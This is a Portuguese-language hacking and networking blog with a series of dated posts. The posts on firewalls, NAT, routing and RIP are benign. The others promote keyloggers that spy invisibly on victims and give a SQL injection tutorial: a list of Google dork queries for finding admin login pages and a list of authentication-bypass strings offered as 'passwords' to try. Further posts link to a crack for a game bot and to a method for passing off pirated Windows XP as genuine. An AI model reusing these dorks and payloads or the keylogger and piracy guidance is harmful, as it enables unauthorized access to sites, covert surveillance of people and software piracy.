quinta-feira, 10 de abril de 2008

Video Aula Sobre Keylogger- Parte



Keylogger

É um tipo de Programar capaz de captura e armazenar

as teclas digitadas pelo usuário e depois manda essas informações via ftp ou email.
Os Keylogger atualmente além de capturas teclas eles
possuem outras funções como:






  • Trojan
  • Spy
  • Malware
  • botnet, etc.
Uma das características do Keylogger e que eles ficam na maquina da vitima de maneira invisível. Os keylogger modernos alem de copiar todos os dados digitados eles tira Screenshot da tela do computador e gravam eventos do mouse.



List The Keylogger
:


  • Perfect Keylogger
  • Ardamax Keylogger
  • Activity Keylogger v1.0
  • Advanced Invisible Keylogger 1.5 Full
  • Aplus
  • Barok 1.0
  • Chota
  • Computer Spy
  • Curiosity
  • CYBERSHOK 1.0 Private (looks interesting)
  • DK2Full
  • ehks 2.2
  • Elite Keylogger 1.0
  • EyeSpy
  • Fearless Key Spy 2.0
  • FSK 2.0

Vídeo Aula Abaixo:




Creditos:
Blackhat Center
Portal Hacker
Bill (youtube)
Googlehacker
obs: Esta Vidéo aula e para usuario que já usam keylogger

sexta-feira, 28 de março de 2008


SQL INJECTION TUTORIAL E VIDEO AULA PARTE I

Depois de muito tempo sem atualizar o blog por motivos maiores. Estamos de volta com toda a força fazendo deste espaço uma grande enciclopédia de informações da aréa de
TIC.




O que é SQL?
Structured Query Language, ou Linguagem de Consulta Estruturada ou SQL. É padrão para linguagens de instruções enviadas a banco de dados. Deve ser utilizada em conjunto com um banco de dados relacional.

O QUE É SQL INJECTION DEFINIÇÃO?

E
SQL Injection é uma técnica que explora vulnerabilidades de segurança em banco de dados de uma aplicação. Uma vez que os aplicativos web aceitam parâmetros informados pelos usuários e tais parâmetros não são filtrados corretamente, dessa forma torna-se possível a inserção de instruções SQL inesperadas.

Allinurl: Esse código serve para listar todas as URL que contem por exemplo a palavra web\admin.asp, etc.

Exemplos Para teste:
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp

Exemplo de Senhas:
  • b' or ' 1='
  • ' or '1
  • ' or '|
  • ' or 'a'='a
  • ' or ''='
  • ' or 1=1--
  • ') or ('a'='a
  • ' or '1'='1
  • admin ' - -
  • ' ou 0=0 --
  • "ou 0=0 --
  • ou 0=0 --
  • ' ou 0=0 #
  • "ou 0=0 #
  • ou 0=0 #
  • ' ou ' x'='x

Créditos e Fontes:
Let's Hack.
Fórum Hacker Invasão.
http://imasters.uol.com.br/artigo/7069/dreamweaver/dreamweaver_e_sql_injection/


Video Logo Abaixo

segunda-feira, 10 de setembro de 2007

Firewall Parte-2


Implementações Usadas em Firewall

Esta e segunda parte do artigo sobre Firewall, na etapa anterior
falamos sobre o que e um firewall e tambem citamos algumas implementações que podem ser feitas apartir de um firewall
visando a segurnça dos dados que trafegam na rede.
Primeiro vamos relembrar o qué um Firewall?
Firewall e um dispositivo de segurança que funciona como uma
barreira de fogo, cabe ao Firewall controla todo acésso a rede a qual ele protege, permintindo ou negando o acesso.


O firewall funcionar de duas maneiras basicas:
A primeira maneira e baseada na filtragem de pacotes e uma segunda que é baseada no controle de aplicações.

Filtragem de pacotes

E muito utilizada em redes pequenas ou de tamanho medio, atraves de regras definidas o
firewall determina quais endereços IPs podem transmitir ou receber dados.
os firewall que funcionam como filtradores de pacote tambem podem ser implementados
para definir que apenas computadores conhecidos troquem informações e também analisar
informações da conexão e verificar se existe alterações suspeitas e ate mesmo bloquealas
Alem de analisar o contudo dos pacotes enviados e recebidos tendo um controle maior do que trafega na rede.


Firewall de Aplicação

Os firewall de aplicação geralmente são usados em servidores e tambem são conhecidos
como proxy. Na verdade esse tipo de firewall na permite a comunicação direta entre a internet e rede interna ele funciona como uma intermediador entre a rede interna e a internet.
Todas as aplicações da rede precisam de um respectivo proxy e as que não tiverem serão impedidas de rodarem na rede. Uma das grandes vantagens do firewall de aplicação e que ele ofereçe ferramentas de controle de acesso e de trafego da rede que podem ser geradas atraves de log especificos.


Tipos de Firewall

  • Dual Homed Gateway.
  • Sreened Home Gateway.
  • Screening Router.
Dual Homed Gateway

E composto por um sistema com duas interfaçes de rede, sistema esse que e configurado para que os pacotes sejam diretamente roteados de uma rede para outra. As maquinas da internet podem se comunicar com o gateway da mesma maneira que as maquina da rede interna porém o trafego entre as duas redes e bloqueado.
A desvantagem do dual homed gateway e que ele bloquei o trafego ip em ambas direções e as aplicações da rede interna que precisam de roteamento para maquinas da rede externa ficam impedidas de realizar a comunicação. A solução para esse problema seria a configuração de um servidor Proxy Junto com o dual Homed Gateway.
O proxy faria o controle entre as aplicações tanto do cliente como dos servidores e atraves do roteamento de pacotes seria efetuada a comunicação de maneira segura.

Sreened Home Gateway

E um firewall que funciona com uma unica interfaçe de rede e normalmente configurado para bloquear todo tipo de trafego para rede interna "LAN" permintindo acesso apenas as portas do Bastion host que fica na rede interna. Desta forma a zona de risco fica restrita ao Bastion Host.
Bastion Host (E uma maquina configurada para exercer uma função critica de segurança da rede interna, o Bastion a função de packet filter e tambem funciona como Application Gateway por que funciona como Gateway no nivel de aplicação).

Screening Router

Esse tipo de firewall permite a comnunicação direta entre multiplos hosts, sua zona de risco e igual ao numero de hosts da rede privada.
Screening Router não devem ser usado para proteger informações confidencias pois ele permite o livre acesso a internet de dentro da rede privada.

Screened Subnet

Neste tipo de firewall uma sub-rede isolada e criada e fica situada entre a internet e a rede privada. A rede pode ser isolada usando um screened router que irão implementa varios nives de filtragens. O screened subnet deve ser implementado de maneira que tanto a internet quanto a rede privada tenham acesso a mesma, mas o trafego atraves do screened subnet e bloqueado.
O screened subnet normalmente e configurado junto com um bastion host com um unico ponto de acesso a rede.
A vantagem do Screened subnet e que ele e bloqueia o roteamento entre redes com isso dificulta a ação de intrusos pois o invasor sera obrigado a reconfigurar o roteamento das tres rede sem desconectala

Veja mais no Link Abaixo

UFRJ (Universidade Federal do Rio de Janeiro).



Bibliografias consultadas
UnB - Departamento de Engenharia ElétricaUnB
Mestrado em Engenharia de Redes e Tecnologias da Informação

Prof. Dr. Rafael T. de Sousa Jr. e Prof. MSc. Ricardo S. Puttini.
Creditos:
Ifowester.
Unb.







quarta-feira, 5 de setembro de 2007

Firewall (Parede de Fogo)


Firewall

O termo firewall surgiu no final da decada de 80,Firewall e um equipamento ativo de rede que funcionar com uma parede de fogo.
A principal função de um Firewall e controlar todo acesso a rede interna, ele funcionar como uma especie de filtro que controla todas as comunicações de uma rede, permitindo ou negando acesso.
Através do Firewall e implementado politicas de acesso a rede onde todas as conexões e solicitações passam atraves do Firewall onde serão examindas e avaliadas.

A função de firewall pode ser exercida por um router com função de firewall ou por uma maquina da rede local configurada para realizar o papel do firewall, ou ate mesmo por algum programar.
Os Firewall se dividem em duas categorias basicas:
Firewall de Nivél de rede.
Firewall de gateway ou de proxy.

Firewall de Nivél de Rede:

Os firewall de nivél de rede são geralmente roteadores com a capacidade de filtragem de pacotes, nesses roteadores podem ser implementado diversos serviços.
Filtragem de pacotes e o processo de permitir ou evitar o trafego de pacotes entre redes com base nas informações contidas em cada pacote.

Firewall de Gateway ou de proxy:

E um processo no qual se mantem um estado de comunicação onde todo fluxo de dados e examinado. o proxy tem a função de evitar que um host da rede interna seja acessado por uma maquina esteja fora da sua rede interna ou protegida e utilizar duas conexões uma entre cliente e servidor e outra entre servidor proxy e servidor real.
A vantagem de gateways é que eles impedem o tunelamento de pacotes de IP em sua rede. A desvantagem e que eles exigem overheads altos e envolvimento substancial de sua parte. um aplicativo proxy deve ser configurado para cada serviço na rede, incluindo FTP, Telnet, HTTP, CORREIO, etc.


Porximos Assuntos

Algumas implementações utilizadas em firewall que irei fala no proximo artigo:
  • Standalone System (Sistem autônomo).
  • Screening Router (Filter Router).
  • Bastion Host (Packet Filter).
  • Dual Homed Gateway (sistema com duas interfaçe de rede).
  • Screened Host Gateway (Baseado em um screen router ou bastion router).
  • Screened Subnet (Sub-rede isolada).

Mais nos Links Abaixo

Infowester.
Microsoft®.
Download de firewal.








domingo, 2 de setembro de 2007

Protegendo sua Rede

Segurança de Redes

Com o grande evolução da tecnologia nos ultimos anos,
e a expansão dos meios de comunicação a internet consolidou se como um dos principais meios de comunicação
global, milhões de pessoas no mundo trocam informações ou ate realizam grandes negoçios via internet.
Nos dias atuais tanto as empresas como os usuarios comun
prezam pela segurança de suas informações, dia apos dias
os meios de comunicação em massa publicão questões relacionadas a grande rede que vão desde de fraudes ou ate
roubo de informações valiosas, e como no seculo XXI ter boas informações e o mesmo que ter poder, passamos a preza a questão da segurança.
Então as empresas tem adotado politica de segurança da
informação muito severas, mais o qué e mesmo politica de segurança?


A política de segurança não define procedimentos específicos de manipulação e proteção da informação, mas atribui direitos e responsabilidades às pessoas (usuários, administradores de redes e sistemas, funcionários, gerentes, etc.) que lidam com essa informação. Desta forma, elas sabem quais as expectativas que podem ter e quais são as suas atribuições em relação à segurança dos recursos computacionais com os quais trabalham. Além disso, a política de segurança também estipula as penalidades às quais estão sujeitos aqueles que a descumprem.

Veja mais no link abaixo.
link microsoft®

Creditos Silvio(cheira cola).

quarta-feira, 29 de agosto de 2007

TibiaBot NG


Tutorial Sobre TibiaBot NG

O novo tibiaBot NG versão 4.5.8
é uma modificação profissionalmente
crafted do cliente para o papel em linha
multiplayer, e o unico programar ao redor
do mundo que ofereçe ao jogador inumeros
beneficios. Foi desenvolvido inicialmente para uso proprio e logo depois passou a ser comercializado em todo mundo, hojé o TibiaBot NG e um programar famoso em todo mundo. Entre as funções do novo TibiaBot NG podemos destacar as seguintes:


(Cave Hunting, Auto Uh, Auto LooT, Train magic lvl and skill, etc).

Download do Programar
Site oficial click here.
PowerHex Programar nescessario para
Crackiar o NG
Click Here.
Tutorial ensinando todos os passos
Click here.
Obs: Não sou responsavél por qualquer dano ao seu
personagem, aconselho a todos depois de realizarem
todos procedimentos e desisinstalar o power hex.
DÊ SUA OPNIÃO PREENCHENDO O FORMULARIO ABAIXO:

segunda-feira, 27 de agosto de 2007

NAT (Networking Address Translation

O que é NAT?

Network Address Translation - Mecanismo que permite a conexão de redes privadas à rede Internet sem alteração dos endereços reservados. Através de um NAT server os endereços de rede reservados são convertidos para endereços públicos quando se torna necessário o acesso à rede Internet. Com este mecanismo, diversos computadorescom endereços internos podem compartilhar um único endereço IP.
Ou seja NAT e um protocolo como o proprio nome
diz que faz a tradução dos endereços ip e portas TCP da rede local para internet.

Veja mais nos Link abaixo:

sexta-feira, 24 de agosto de 2007

Roteamento


Introdução

Roteamento e principal forma
usada na Internet para entrega
de pacotes de dados entre host
e equipamentos de redes.
A Internet e uma grande coleção
de redes interconectadas, os roteadores
fazem o trabalho de ligação dessas
redes e também de comunicação.
Através dos roteadores duas ou mais
redes distintas, com topologias diferentes
podem se comunicar.

Veja mais nos link abaixo:

Roteamento: O que é Importante Saber
Multicast nativo.
obs: Multicast ainda não foi abordado
em sala de aula mais logo estudaremos sobre ele
mais adiante, então e bom ir dando uma lida sobre
o assunto.



quarta-feira, 22 de agosto de 2007

RIP- Routing Internet Protocol


E um protocolo de roteamento
que usam vetores de distância
no intuito de comparar matematicamente
rotas para identificar o melhor trajeto.
O RIP emite mensagens do roteamento
para verificar as atualizações da rede
em intervalos regulares (a cada 30 segundos)
e quando a topologia da rede mudar, o roteador
recebe uma atualização do roteamento
que inclua mudanças a uma entrada, atualiza
sua tabela de roteamento para refletir a rota nova.
Veja mais AQUI


terça-feira, 21 de agosto de 2007

Redes de Computadores


Tutorias de Redes

Este site contem otimas
tutorias de redes que
abordam sobres todos
os assuntos relacionados
a redes de computadores.
Relação de assuntos:
TCP/IP, Endereçamento, Roteamento,
Sub Netting, DNS,DHCP, RIP, OSPF, NAT
ICF(Internet Connection Firewall) IPsec, etc.
Link com todos esses materias AQUI



Linux Vs Windows


Fundação Linux aconselha a "respeitar a Microsoft"

O diretor executivo da linux
Foundation, aconselhou ao
usuario e desenvolvedores
do sistema operacional linux
a pararem de fazer piadas em
relação ao Windows, segundo Jim
Zemlin não ha como brigar com
o sistema operacional Windows e
que no futuro os dois sistemas
operacionias farão um duopolio
no mercado.

Veja Mais no Lnk

Nanotecnologia


Cientistas afirmam ter superado a velocidade da luz.

O Dr. Günter Nimtz tenta há vários anos desafiar um dos principais pilares da Física atual, o de que nada pode superar a velocidade da luz. Os resultados de suas pesquisas nunca suscitaram a unanimidade entre os seus colegas físicos, mas agora ele e seu colega Alfons Stahlhofen estão sendo categóricos em afirmar que finalmente conseguiram fazer com que fótons viajassem mais rápido do que a teoria diz ser possível.

Veja no seguinte link

segunda-feira, 20 de agosto de 2007

Validação do Windows XP


Tutorial
Transformar Windows Pirata em Original

Existem varias maneiras de Transformar seus Winxp pirata em uma versão original sem pagar nada a Microsoft.
A tutorial abaixo ensinara como transformar o seu Winxp
pirata em original sem precisa tira nenhum centavo do bolso. Caso o procedimento abaixo explicado não funcione. Verifiquei se não houve erro durante a execução do procidemento.

Link rapidshare.


Lembrando Pirataria e Crime!!!